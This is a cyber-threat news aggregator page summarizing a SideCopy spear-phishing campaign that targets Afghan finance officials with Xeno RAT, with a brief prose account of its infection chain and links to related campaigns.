Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Watchlists Beta Browse News Feed Stats About Contact

SideCopy Operation XENOFISCAL spear-phishing campaign targeting Afghan finance entities

Campaign
First reported
Last updated
Happening score
H score 25
1 unique sources, 1 articles

Summary

Hide ▲

The SideCopy-linked Operation XENOFISCAL spear-phishing campaign is targeting Afghanistan's Ministry of Finance and related provincial finance offices with Xeno RAT, raising the risk of host compromise across government systems. Delivery uses a ZIP archive with a malicious LNK file and a Pashto-language lure, then chains mshta.exe into an HTA fetch and in-memory JavaScript execution. The operation extends to provincial revenue and finance directorates, Pashto-speaking government officials, and provincial-level employees, showing a focused government-targeting effort.

Related Happenings

Transparent Tribe AI-assisted implant campaign targeting India

Campaign
First: 06.03.2026 17:11 Last: 06.03.2026 17:11 Sources 1

About this happening: **Transparent Tribe (APT36)** is using **AI-powered coding tools** to mass-produce disposable implants in an active **campaign** targeting the **Indian government**, its embassies...

Open Happening

APT36 / SideCopy phishing-led campaign targeting Indian defense organizations

Campaign
First: 11.02.2026 16:52 Last: 11.02.2026 16:52 Sources 1

About this happening: A **phishing-led** **APT36 / SideCopy** campaign is targeting **Indian defense and government-aligned organizations**, using cross-platform **RATs** to steal sensitive data and ke...

Open Happening

Bloody Wolf / Stan Ghouls NetSupport RAT spear-phishing campaign

Campaign
First: 09.02.2026 12:58 Last: 09.02.2026 12:58 Sources 1

About this happening: The **Bloody Wolf / Stan Ghouls** operation is actively running a **spear-phishing campaign** against **Uzbekistan and Russia**, and the activity matters because it is delivering...

Open Happening

Phantom Stealer phishing delivery and exfiltration activity

Malware Activity
First: 15.12.2025 18:00 Last: 15.12.2025 18:00 Sources 1

About this happening: **Phantom Stealer** is being delivered through a **phishing campaign** that uses a **ZIP-to-ISO attachment chain** to bypass mail defenses, exposing **Russian-speaking organizatio...

Open Happening

Operation MoneyMount-ISO Phantom Stealer phishing campaign targeting Russian finance entities

Campaign
First: 15.12.2025 11:24 Last: 15.12.2025 11:24 Sources 1

About this happening: The **Operation MoneyMount-ISO** phishing campaign is actively targeting organizations in **Russia**, and it matters because the emails deliver **Phantom Stealer** through **malic...

Open Happening

Timeline

  1. 02.06.2026 12:05 2 articles · 2h ago

    SideCopy Operation XENOFISCAL targets Afghanistan's Ministry of Finance with Xeno RAT

    Initial Disclosure

    SideCopy's Operation XENOFISCAL targets Afghanistan's Ministry of Finance, related provincial revenue and finance directorates, Pashto-speaking government officials, and provincial-level government employees with Xeno RAT. The lure uses a ZIP archive containing a malicious LNK file with a Pashto-language filename, and execution chains mshta.exe to fetch an HTA from a compromised Afghan education domain, run obfuscated JavaScript in memory, and deploy Xeno RAT 1.8.7 with Registry-based persistence and a decoy document.

    Show sources
    Open in new tab